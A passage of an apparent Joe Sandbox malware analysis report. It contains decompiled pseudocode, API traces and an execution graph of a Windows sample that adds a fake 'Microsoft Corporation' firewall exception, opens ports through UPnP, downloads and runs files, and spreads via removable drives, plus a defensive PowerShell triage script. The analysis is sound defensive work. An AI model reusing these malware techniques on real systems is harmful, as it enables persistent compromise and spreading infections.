                                                                                  					}
                                                                                  					goto L34;
                                                                                  				}
                                                                                  				goto L34;
                                                                                  			}
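The routine above, read as a firewall-exception routine, leaves a durable host artifact: an entry in the legacy Windows Firewall authorized-applications list named "Microsoft Corporation" and scoped to all networks, pointing at the sample's image path. The script below is an added triage example, not part of the Joe Sandbox report and not code from the sample; it enumerates that list through the same HNetCfg.FwMgr COM object and reports entries whose display name claims Microsoft but whose image is not Microsoft-signed or lives outside the usual install trees. It assumes an elevated PowerShell session on the host under investigation; the function name, parameter names and the "trusted roots" heuristic are my own choices.

```powershell
# Added triage script (not from the report or the sample). Walks the legacy
# Windows Firewall authorized-applications list via HNetCfg.FwMgr, the COM
# object whose vtable calls E00405520 appears to make, and flags entries whose
# name claims Microsoft but whose image is unsigned, foreign-signed, missing,
# or outside the Windows / Program Files trees.
# Assumptions (mine): elevated session on Windows; hypothetical function name.

function Get-SuspiciousFirewallExceptions {
    [CmdletBinding()]
    param(
        # Display name the sample assigns to its own entry (put_Name above).
        [string]$SuspectName = 'Microsoft Corporation',

        # Image paths under these roots are treated as ordinary.
        [string[]]$TrustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)})
    )

    $fwMgr     = New-Object -ComObject HNetCfg.FwMgr    # INetFwMgr
    $fwProfile = $fwMgr.LocalPolicy.CurrentProfile     # INetFwPolicy -> INetFwProfile
    $apps      = $fwProfile.AuthorizedApplications     # INetFwAuthorizedApplications

    foreach ($app in $apps) {
        $path    = [Environment]::ExpandEnvironmentVariables([string]$app.ProcessImageFileName)
        $reasons = New-Object System.Collections.Generic.List[string]

        $inTrusted = $false
        foreach ($root in $TrustedRoots) {
            if ($root -and $path.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) {
                $inTrusted = $true
                break
            }
        }
        if (-not $inTrusted) { $reasons.Add('image outside Windows/Program Files') }

        if ($path -and (Test-Path -LiteralPath $path -PathType Leaf)) {
            $sig = Get-AuthenticodeSignature -FilePath $path
            if ($sig.Status -ne 'Valid') {
                $reasons.Add("signature status: $($sig.Status)")
            } elseif ($sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
                $reasons.Add("signed by: $($sig.SignerCertificate.Subject)")
            }
        } else {
            $reasons.Add('image not present on disk')
        }

        # Anything with a finding is reported; an entry that also carries the
        # sample's chosen display name is the strongest match.
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Name            = $app.Name
                ClaimsMicrosoft = ($app.Name -eq $SuspectName)
                Image           = $path
                Enabled         = $app.Enabled
                Scope           = $app.Scope     # 0 = NET_FW_SCOPE_ALL, what put_Scope(0) sets
                Reasons         = ($reasons -join '; ')
            }
        }
    }
}

# Usage, from an elevated prompt on the host being triaged:
Get-SuspiciousFirewallExceptions | Sort-Object ClaimsMicrosoft -Descending | Format-Table -AutoSize
```

The check deliberately uses the same legacy interface the sample drives rather than the newer NetSecurity module, so it sees exactly the collection the malware modified; entries added this way also surface as rules under Get-NetFirewallRule, and the signature test is the discriminator, since the display name alone is attacker-controlled.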

                                                                                  APIs
                                                                                    • Part of subcall function 004054D0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004054F0
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405738
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFreeInstanceString
                                                                                  • String ID: Microsoft Corporation
                                                                                  • API String ID: 586785272-3838278685
                                                                                  • Opcode ID: 9a625b98ebff3c221c1120575af285f8cbbbf93c67dc0beb6ef5e6c09e9c2793
                                                                                  • Instruction ID: b68b7a3bc5298b5c42a29c8e1873351d80abb6d03bdfce163c93a33f9d118317
                                                                                  • Opcode Fuzzy Hash: 9a625b98ebff3c221c1120575af285f8cbbbf93c67dc0beb6ef5e6c09e9c2793
                                                                                  • Instruction Fuzzy Hash: 0991FA75A0050ADFCB04DB98C994AAFB7B5EF88300F208169E505B73A0D739AE41DF69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 66%
                                                                                  			E0040CFE0(char* _a4) {
                                                                                  				char _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr* _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _t44;
                                                                                  				intOrPtr* _t46;
                                                                                  				intOrPtr _t59;
                                                                                  				intOrPtr _t62;
                                                                                  				void* _t88;
                                                                                  				void* _t89;
                                                                                  				void* _t90;
                                                                                  
                                                                                  				_v16 = 0;
                                                                                  				_t44 = E0040C610(_a4,  &_v8);
                                                                                  				_t89 = _t88 + 8;
                                                                                  				_v12 = _t44;
                                                                                  				if(_v12 != 0) {
                                                                                  					_t46 = E0040C3B0(_v12);
                                                                                  					_t90 = _t89 + 4;
                                                                                  					_v20 = _t46;
                                                                                  					if(_v20 != 0) {
                                                                                  						_v24 = 0;
                                                                                  						_push( &_v24);
                                                                                  						_push(_v20);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xb4))))() == 0 && _v24 != 0) {
                                                                                  							_v28 = 0;
                                                                                  							_push( &_v28);
                                                                                  							_push(_v24);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x30))))() == 0 && _v28 != 0) {
                                                                                  								_t59 = E0040CF90(_v28);
                                                                                  								_t90 = _t90 + 4;
                                                                                  								_v32 = _t59;
                                                                                  								if(_v32 != 0) {
                                                                                  									_t62 = E0040CE70(_v28);
                                                                                  									_t90 = _t90 + 4;
                                                                                  									_v36 = _t62;
                                                                                  									if(_v36 != 0) {
                                                                                  										E0040B790( &_v16, "%S%S", _v32);
                                                                                  										_t90 = _t90 + 0x10;
                                                                                  										__imp__#6(_v36, _v36);
                                                                                  									}
                                                                                  									__imp__#6(_v32);
                                                                                  								}
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  							}
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                  						}
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  					}
                                                                                  					E00408FB0(_v12);
                                                                                  				}
                                                                                  				return _v16;
                                                                                  			}

                                                                                  APIs
                                                                                    • Part of subcall function 0040C610: memset.NTDLL ref: 0040C638
                                                                                    • Part of subcall function 0040C610: InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
                                                                                    • Part of subcall function 0040C610: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
                                                                                    • Part of subcall function 0040C610: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
                                                                                    • Part of subcall function 0040C610: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
                                                                                    • Part of subcall function 0040C610: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
                                                                                    • Part of subcall function 0040C610: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
                                                                                    • Part of subcall function 0040C610: InternetCloseHandle.WININET(00000000), ref: 0040C807
                                                                                    • Part of subcall function 0040C3B0: SysAllocString.OLEAUT32(00000000), ref: 0040C3DE
                                                                                    • Part of subcall function 0040C3B0: CoCreateInstance.OLE32(00410328,00000000,00004401,00410318,00000000), ref: 0040C406
                                                                                    • Part of subcall function 0040C3B0: SysFreeString.OLEAUT32(00000000), ref: 0040C4A1
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040D0BB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040D0C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                  • String ID: %S%S
                                                                                  • API String ID: 1017111014-3267608656
                                                                                  • Opcode ID: b9efebc393b8cab70bab4711f02a4fc852ff42516b9a7e65ccb39fe286daf9b4
                                                                                  • Instruction ID: 8f39198d2c77811fae4d9ce9e1f2edbe33952e684686135c492452eaad7f6a38
                                                                                  • Opcode Fuzzy Hash: b9efebc393b8cab70bab4711f02a4fc852ff42516b9a7e65ccb39fe286daf9b4
                                                                                  • Instruction Fuzzy Hash: CC412CB5D00209DFCB04DBD4C885AEFB7B5BF88308F108569E505B7391D739AA85CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040D3D0() {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v12;
                                                                                  				signed int _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _t20;
                                                                                  				intOrPtr _t26;
                                                                                  				intOrPtr _t31;
                                                                                  				void* _t36;
                                                                                  				void* _t37;
                                                                                  
                                                                                  				__imp__CoInitializeEx(0, 2);
                                                                                  				_v12 = 0;
                                                                                  				_t20 = E0040C930( &_v12,  &_v12);
                                                                                  				_t37 = _t36 + 4;
                                                                                  				_v8 = _t20;
                                                                                  				if(_v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_t20 = E0040CFE0( *((intOrPtr*)(_v12 + _v16 * 4)));
                                                                                  						_t37 = _t37 + 4;
                                                                                  						 *0x414e7c = _t20;
                                                                                  						if( *0x414e7c == 0) {
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						}
                                                                                  						_v20 = E00409880();
                                                                                  						_t31 =  *0x414e7c; // 0x0
                                                                                  						E0040D350(_t31, _t31, "TCP", 0x9e34, _v20);
                                                                                  						_t26 =  *0x414e7c; // 0x0
                                                                                  						_t20 = E0040D350(_t31, _t26, "UDP", 0x9e34, _v20);
                                                                                  						_t37 = _t37 + 0x20;
                                                                                  						break;
                                                                                  					}
                                                                                  					return E004090D0(_t20, _v8, _v12, _v8);
                                                                                  				}
                                                                                  				return _t20;
                                                                                  			}

0x0040d3da 0x0040d3e0 0x0040d3eb 0x0040d3f0 0x0040d3f3 0x0040d3fa 0x0040d400 0x0040d412 0x0040d424 0x0040d429 0x0040d42c 0x0040d438 0x0040d40f 0x00000000 0x0040d40f 0x0040d43f 0x0040d450 0x0040d457 0x0040d46d 0x0040d473 0x0040d478 0x00000000 0x0040d478 0x00000000 0x0040d48c 0x0040d492

APIs
• CoInitializeEx.OLE32(00000000,00000002,?,?,?,0040686F), ref: 0040D3DA
  • Part of subcall function 0040C930: socket.WS2_32(00000002,00000002,00000011), ref: 0040C94A
  • Part of subcall function 0040C930: htons.WS2_32(0000076C), ref: 0040C980
  • Part of subcall function 0040C930: inet_addr.WS2_32(239.255.255.250), ref: 0040C98F
  • Part of subcall function 0040C930: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C9AD
  • Part of subcall function 0040C930: bind.WS2_32(000000FF,?,00000010), ref: 0040C9E3
  • Part of subcall function 0040C930: lstrlenA.KERNEL32(004105A0,00000000,?,00000010), ref: 0040C9FC
  • Part of subcall function 0040C930: sendto.WS2_32(000000FF,004105A0,00000000), ref: 0040CA0B
  • Part of subcall function 0040C930: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040CA25
  • Part of subcall function 0040CFE0: SysFreeString.OLEAUT32(00000000), ref: 0040D0BB
  • Part of subcall function 0040CFE0: SysFreeString.OLEAUT32(00000000), ref: 0040D0C5
Strings
Memory Dump Source
• Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
Yara matches
Similarity
• API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
• String ID: TCP$UDP
• API String ID: 1519345861-1097902612
• Opcode ID: ddc30d4bc63b944d249e95f6100ac757865db89eed3a7b623e3ea16a2adfc62d
• Instruction ID: 198a483ec780ca398c4dd107ec41d4ae9ae4b932ff6ccac9155d2369ff036123
• Opcode Fuzzy Hash: ddc30d4bc63b944d249e95f6100ac757865db89eed3a7b623e3ea16a2adfc62d
• Instruction Fuzzy Hash: 5A11B4B4D00208EBDB00EBE4D845FAE7774BB44304F10856AE511773C2D7796A58CF99
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 0.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1461
Total number of Limit Nodes: 2
                                                                                  execution_graph 5052 40c240 5055 40df70 5052->5055 5054 40c261 5056 40df8f 5055->5056 5069 40e083 5055->5069 5057 408e60 __aligned_recalloc_base 7 API calls 5056->5057 5056->5069 5058 40dfb6 memcpy htons 5057->5058 5059 40e05c 5058->5059 5060 40e006 sendto 5058->5060 5061 408fb0 __aligned_recalloc_base 3 API calls 5059->5061 5062 40e025 InterlockedExchangeAdd 5060->5062 5063 40e058 5060->5063 5064 40e06b 5061->5064 5062->5060 5065 40e03b 5062->5065 5063->5059 5066 40e079 5063->5066 5064->5054 5068 408fb0 __aligned_recalloc_base 3 API calls 5065->5068 5067 408fb0 __aligned_recalloc_base 3 API calls 5066->5067 5067->5069 5070 40e04a 5068->5070 5069->5054 5070->5054 5071 40c2c0 5081 40e110 5071->5081 5073 40c2ce 5074 40c34d 5073->5074 5076 40c2e8 InterlockedExchangeAdd 5073->5076 5077 40c32c WaitForSingleObject 5073->5077 5093 409f60 EnterCriticalSection 5073->5093 5098 40a390 5073->5098 5076->5073 5076->5077 5077->5073 5078 40c345 5077->5078 5101 40e0a0 5078->5101 5082 408e40 7 API calls 5081->5082 5083 40e11b CreateEventA socket 5082->5083 5084 40e152 5083->5084 5085 40e157 5083->5085 5088 40e0a0 8 API calls 5084->5088 5086 40e1ba 5085->5086 5087 40e15d bind 5085->5087 5086->5073 5089 40e190 5087->5089 5090 40e19c CreateThread 5087->5090 5088->5085 5091 40e0a0 8 API calls 5089->5091 5090->5086 5092 40e195 5091->5092 5092->5073 5094 409f97 LeaveCriticalSection 5093->5094 5095 409f7f 5093->5095 5094->5073 5096 40ab90 3 API calls 5095->5096 5097 409f8a 5096->5097 5097->5094 5111 40a1a0 5098->5111 5102 40e0a4 5101->5102 5108 40e100 5101->5108 5103 40e0ac SetEvent WaitForSingleObject CloseHandle 5102->5103 5102->5108 5104 40e0d4 5103->5104 5110 40e0f0 5103->5110 5109 408fb0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5104->5109 5104->5110 5106 40e0fa 5107 408fb0 __aligned_recalloc_base 3 API calls 5106->5107 5107->5108 5108->5074 5109->5104 5119 409940 shutdown 
closesocket 5110->5119 5112 40abd0 3 API calls 5111->5112 5113 40a1ab 5112->5113 5114 40a1c7 lstrlenA 5113->5114 5115 40ae60 7 API calls 5114->5115 5116 40a1fd 5115->5116 5117 40a228 5116->5117 5118 408fb0 __aligned_recalloc_base 3 API calls 5116->5118 5117->5073 5118->5117 5119->5106 5512 405800 5513 405867 5512->5513 5514 405811 5512->5514 5515 40d890 60 API calls 5513->5515 5518 405865 5513->5518 5517 405820 StrChrA 5514->5517 5514->5518 5522 40d890 GetTickCount srand ExpandEnvironmentStringsW 5514->5522 5515->5518 5516 408fb0 __aligned_recalloc_base 3 API calls 5519 405892 5516->5519 5517->5514 5518->5516 5523 40d8de 5522->5523 5523->5523 5524 40d8fc mbstowcs rand rand wsprintfW InternetOpenW 5523->5524 5525 40db00 InternetCloseHandle Sleep 5524->5525 5526 40d995 InternetOpenUrlW 5524->5526 5529 40584f Sleep 5525->5529 5530 40db27 6 API calls 5525->5530 5527 40daf3 InternetCloseHandle 5526->5527 5528 40d9c4 CreateFileW 5526->5528 5527->5525 5531 40d9f3 InternetReadFile 5528->5531 5532 40dae6 CloseHandle 5528->5532 5529->5514 5530->5529 5533 40dba9 wsprintfW DeleteFileW Sleep 5530->5533 5534 40da46 CloseHandle wsprintfW DeleteFileW Sleep 5531->5534 5535 40da17 5531->5535 5532->5527 5536 40d580 20 API calls 5533->5536 5552 40d580 CreateFileW 5534->5552 5535->5534 5537 40da20 WriteFile 5535->5537 5539 40dbe9 5536->5539 5537->5531 5541 40dbf3 Sleep 5539->5541 5542 40dc27 DeleteFileW 5539->5542 5545 40d740 5 API calls 5541->5545 5542->5529 5543 40dad9 DeleteFileW 5543->5532 5544 40da9d Sleep 5546 40d740 5 API calls 5544->5546 5547 40dc0a 5545->5547 5548 40dab4 5546->5548 5547->5529 5549 40dc1d ExitProcess 5547->5549 5550 40dad0 5548->5550 5551 40dac8 ExitProcess 5548->5551 5550->5532 5553 40d6d3 5552->5553 5554 40d5c7 CreateFileMappingW 5552->5554 5557 40d6d9 CreateFileW 5553->5557 5558 40d72a 5553->5558 5555 40d5e8 MapViewOfFile 5554->5555 5556 40d6c9 CloseHandle 5554->5556 5559 40d607 GetFileSize 5555->5559 5560 40d6bf CloseHandle 5555->5560 5556->5553 5561 40d721 
5557->5561 5562 40d6fb WriteFile CloseHandle 5557->5562 5558->5543 5558->5544 5563 40d623 5559->5563 5564 40d6b5 UnmapViewOfFile 5559->5564 5560->5556 5565 408fb0 __aligned_recalloc_base 3 API calls 5561->5565 5562->5561 5572 40b4c0 5563->5572 5564->5560 5565->5558 5568 40ae60 7 API calls 5569 40d66e 5568->5569 5569->5564 5570 408fb0 __aligned_recalloc_base 3 API calls 5569->5570 5571 40d6ab 5570->5571 5571->5564 5573 40af50 10 API calls 5572->5573 5574 40b4e4 5573->5574 5574->5564 5574->5568 5575 404000 5576 404009 memset GetModuleHandleW 5575->5576 5577 404042 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5576->5577 5577->5577 5578 404080 CreateWindowExW 5577->5578 5579 4040ab 5578->5579 5580 4040ad GetMessageA 5578->5580 5581 4040df ExitThread 5579->5581 5582 4040c1 TranslateMessage DispatchMessageA 5580->5582 5583 4040d7 5580->5583 5582->5580 5583->5576 5583->5581 5584 405900 5585 405969 Sleep 5584->5585 5586 405980 5585->5586 5587 405a00 Sleep 5586->5587 5588 405998 Sleep wsprintfA 5586->5588 5590 40d890 60 API calls 5586->5590 5587->5585 5591 40d7f0 InternetOpenA 5588->5591 5590->5586 5592 40d816 InternetOpenUrlA 5591->5592 5593 40d888 5591->5593 5594 40d835 HttpQueryInfoA 5592->5594 5595 40d87e InternetCloseHandle 5592->5595 5593->5586 5596 40d874 InternetCloseHandle 5594->5596 5597 40d85e 5594->5597 5595->5593 5596->5595 5597->5596 5598 40bd00 5599 40bd17 5598->5599 5613 40bd6e 5598->5613 5600 40bd21 5599->5600 5601 40bd73 5599->5601 5602 40bdbd 5599->5602 5599->5613 5603 408e40 7 API calls 5600->5603 5605 40bd98 5601->5605 5606 40bd8b InterlockedDecrement 5601->5606 5631 40a890 5602->5631 5607 40bd2e 5603->5607 5608 408fb0 __aligned_recalloc_base 3 API calls 5605->5608 5606->5605 5620 40e440 5607->5620 5610 40bda4 5608->5610 5611 408fb0 __aligned_recalloc_base 3 API calls 5610->5611 5611->5613 5616 40bd5b InterlockedIncrement 5616->5613 5617 40a4f0 115 API calls 5618 40bde3 5617->5618 5618->5613 5618->5617 5636 40a990 5618->5636 5621 40e444 
5620->5621 5622 40bd40 5620->5622 5621->5622 5623 40e455 InterlockedIncrement 5621->5623 5624 409c30 5622->5624 5623->5622 5625 409ab0 2 API calls 5624->5625 5626 409c3f 5625->5626 5627 409c49 5626->5627 5628 409c4d EnterCriticalSection 5626->5628 5627->5613 5627->5616 5629 409c6c LeaveCriticalSection 5628->5629 5629->5627 5632 40a8a3 5631->5632 5633 40a8cd memcpy 5631->5633 5634 408ea0 9 API calls 5632->5634 5633->5618 5635 40a8c4 5634->5635 5635->5633 5637 40a9b9 5636->5637 5638 40a9ae 5636->5638 5637->5638 5639 40a9d1 memmove 5637->5639 5638->5618 5639->5638 5640 405106 5648 4050e8 5640->5648 5641 405228 Sleep 5641->5648 5642 405119 5659 404860 5642->5659 5645 405238 ExitThread 5646 405150 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5650 4051c6 wsprintfW 5646->5650 5651 4051db wsprintfW 5646->5651 5648->5641 5648->5642 5648->5645 5653 4048c0 GetLogicalDrives 5648->5653 5649 40514b 5650->5651 5665 404bd0 _chkstk 5651->5665 5656 4048ed 5653->5656 5654 404966 5654->5648 5655 4048fc RegOpenKeyExW 5655->5656 5657 40491e RegQueryValueExW 5655->5657 5656->5654 5656->5655 5658 40495a RegCloseKey 5656->5658 5657->5656 5657->5658 5658->5656 5660 4048b9 5659->5660 5661 40487c 5659->5661 5660->5646 5660->5649 5700 4047e0 GetDriveTypeW 5661->5700 5664 4048ab lstrcpyW 5664->5660 5666 404be7 5665->5666 5667 404bee 6 API calls 5665->5667 5666->5649 5668 404ca2 5667->5668 5669 404ce4 PathFileExistsW 5667->5669 5705 40d530 CreateFileW 5668->5705 5671 404d60 PathFileExistsW 5669->5671 5672 404cf5 PathFileExistsW 5669->5672 5676 404d71 5671->5676 5677 404db6 FindFirstFileW 5671->5677 5674 404d06 CreateDirectoryW 5672->5674 5675 404d28 PathFileExistsW 5672->5675 5674->5675 5679 404d19 SetFileAttributesW 5674->5679 5675->5671 5680 404d39 CopyFileW 5675->5680 5681 404d91 5676->5681 5682 404d79 5676->5682 5677->5666 5693 404ddd 5677->5693 5678 404cc5 SetFileAttributesW DeleteFileW 5678->5669 5679->5675 5680->5671 5685 404d51 SetFileAttributesW 5680->5685 5683 404980 3 
API calls 5681->5683 5708 404980 CoInitialize CoCreateInstance 5682->5708 5687 404d8c SetFileAttributesW 5683->5687 5684 404e9f lstrcmpW 5688 404eb5 lstrcmpW 5684->5688 5684->5693 5685->5671 5687->5677 5688->5693 5690 405076 FindNextFileW 5690->5684 5691 405092 FindClose 5690->5691 5691->5666 5692 404efb lstrcmpiW 5692->5693 5693->5684 5693->5690 5693->5692 5694 404f62 PathMatchSpecW 5693->5694 5695 404fe0 PathFileExistsW 5693->5695 5699 404a90 11 API calls 5693->5699 5694->5693 5696 404f83 wsprintfW SetFileAttributesW DeleteFileW 5694->5696 5695->5693 5697 404ff6 wsprintfW wsprintfW 5695->5697 5696->5693 5697->5693 5698 405060 MoveFileExW 5697->5698 5698->5690 5699->5693 5701 404808 5700->5701 5703 40481a 5700->5703 5702 40481c QueryDosDeviceW 5701->5702 5701->5703 5702->5703 5704 404836 StrCmpNW 5702->5704 5703->5660 5703->5664 5704->5703 5706 404cae 5705->5706 5707 40d55f GetFileSize CloseHandle 5705->5707 5706->5669 5706->5678 5707->5706 5709 4049b6 5708->5709 5711 4049f2 5708->5711 5710 4049c0 wsprintfW 5709->5710 5709->5711 5710->5711 5711->5687 5712 40f088 5713 40f090 5712->5713 5715 40f144 5713->5715 5718 40f2cd 5713->5718 5716 40f0c9 5716->5715 5722 40f1b8 RtlUnwind 5716->5722 5719 40f2e2 5718->5719 5721 40f2fe 5718->5721 5720 40f36d NtQueryVirtualMemory 5719->5720 5719->5721 5720->5721 5721->5716 5723 40f1d0 5722->5723 5723->5716 5120 404fcb 5133 404ecb 5120->5133 5121 404f62 PathMatchSpecW 5123 404f83 wsprintfW SetFileAttributesW DeleteFileW 5121->5123 5121->5133 5122 404fe0 PathFileExistsW 5125 404ff6 wsprintfW wsprintfW 5122->5125 5122->5133 5123->5133 5124 405076 FindNextFileW 5127 405092 FindClose 5124->5127 5128 404e9f lstrcmpW 5124->5128 5126 405060 MoveFileExW 5125->5126 5125->5133 5126->5124 5129 40509f 5127->5129 5130 404eb5 lstrcmpW 5128->5130 5128->5133 5130->5133 5132 404efb lstrcmpiW 5132->5133 5133->5121 5133->5122 5133->5124 5133->5132 5134 404a90 CreateDirectoryW wsprintfW FindFirstFileW 5133->5134 5135 404ae5 lstrcmpW 5134->5135 5136 
404bbf 5134->5136 5137 404afb lstrcmpW 5135->5137 5141 404b11 5135->5141 5136->5133 5138 404b13 wsprintfW wsprintfW 5137->5138 5137->5141 5140 404b76 MoveFileExW 5138->5140 5138->5141 5139 404b8c FindNextFileW 5139->5135 5142 404ba8 FindClose RemoveDirectoryW 5139->5142 5140->5139 5141->5139 5142->5136 5724 40908e 5725 408fb0 __aligned_recalloc_base 3 API calls 5724->5725 5728 40904d 5725->5728 5726 409062 5727 408e60 __aligned_recalloc_base 7 API calls 5727->5728 5728->5726 5728->5727 5729 409064 memcpy 5728->5729 5729->5728 5283 40be50 5289 40f030 5283->5289 5286 40be90 5287 40be77 WaitForSingleObject 5293 40e480 5287->5293 5290 40f037 5289->5290 5292 40be66 5289->5292 5290->5292 5314 40eea0 5290->5314 5292->5286 5292->5287 5294 40e488 5293->5294 5313 40e5b2 5293->5313 5295 40e494 EnterCriticalSection 5294->5295 5294->5313 5296 40e530 LeaveCriticalSection SetEvent 5295->5296 5299 40e4ab 5295->5299 5297 40e563 5296->5297 5298 40e54b 5296->5298 5341 40c040 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 5297->5341 5300 40e551 PostQueuedCompletionStatus 5298->5300 5299->5296 5302 40e4bc InterlockedDecrement 5299->5302 5304 40e4d5 InterlockedExchangeAdd 5299->5304 5310 40e51b InterlockedDecrement 5299->5310 5300->5297 5300->5300 5302->5299 5303 40e56e 5350 40c180 5303->5350 5304->5299 5306 40e4e8 InterlockedIncrement 5304->5306 5335 40ead0 WSARecv 5306->5335 5310->5299 5311 40e59f DeleteCriticalSection 5312 408fb0 __aligned_recalloc_base 3 API calls 5311->5312 5312->5313 5313->5286 5315 408e40 7 API calls 5314->5315 5316 40eeab 5315->5316 5317 40eeb8 GetSystemInfo InitializeCriticalSection CreateEventA 5316->5317 5323 40f024 5316->5323 5318 40eef6 CreateIoCompletionPort 5317->5318 5319 40f01f 5317->5319 5318->5319 5320 40ef0f 5318->5320 5321 40e480 36 API calls 5319->5321 5322 40bea0 8 API calls 5320->5322 5321->5323 5324 40ef14 5322->5324 5323->5292 5324->5319 5325 40ef1f WSASocketA 5324->5325 5325->5319 5326 40ef3d setsockopt htons bind 
5325->5326 5326->5319 5327 40efa6 listen 5326->5327 5327->5319 5328 40efba WSACreateEvent 5327->5328 5328->5319 5329 40efc7 WSAEventSelect 5328->5329 5329->5319 5333 40efd9 5329->5333 5330 40efff 5332 40bf50 17 API calls 5330->5332 5331 40bf50 17 API calls 5331->5333 5334 40f014 5332->5334 5333->5330 5333->5331 5334->5292 5336 40eb52 5335->5336 5337 40eb0e 5335->5337 5336->5299 5338 40eb10 WSAGetLastError 5337->5338 5339 40eb24 Sleep WSARecv 5337->5339 5340 40eb5b 5337->5340 5338->5336 5338->5337 5339->5336 5339->5338 5340->5299 5342 40c076 InterlockedExchangeAdd 5341->5342 5343 40c159 GetCurrentThread SetThreadPriority 5341->5343 5342->5343 5346 40c090 5342->5346 5343->5303 5344 40c0a9 EnterCriticalSection 5344->5346 5345 40c117 LeaveCriticalSection 5345->5346 5348 40c12e 5345->5348 5346->5343 5346->5344 5346->5345 5347 40c0f3 WaitForSingleObject 5346->5347 5346->5348 5349 40c14c Sleep 5346->5349 5347->5346 5348->5343 5349->5346 5351 40c202 CloseHandle CloseHandle WSACloseEvent 5350->5351 5352 40c18c EnterCriticalSection 5350->5352 5359 409940 shutdown closesocket 5351->5359 5353 40c1a8 5352->5353 5354 40c1d0 LeaveCriticalSection DeleteCriticalSection 5353->5354 5355 40c1bb CloseHandle 5353->5355 5356 408fb0 __aligned_recalloc_base 3 API calls 5354->5356 5355->5353 5357 40c1f6 5356->5357 5358 408fb0 __aligned_recalloc_base 3 API calls 5357->5358 5358->5351 5359->5311 5143 40bc50 5145 40bc54 5143->5145 5144 409f60 5 API calls 5144->5145 5145->5144 5146 40bc70 WaitForSingleObject 5145->5146 5148 40bc95 5145->5148 5149 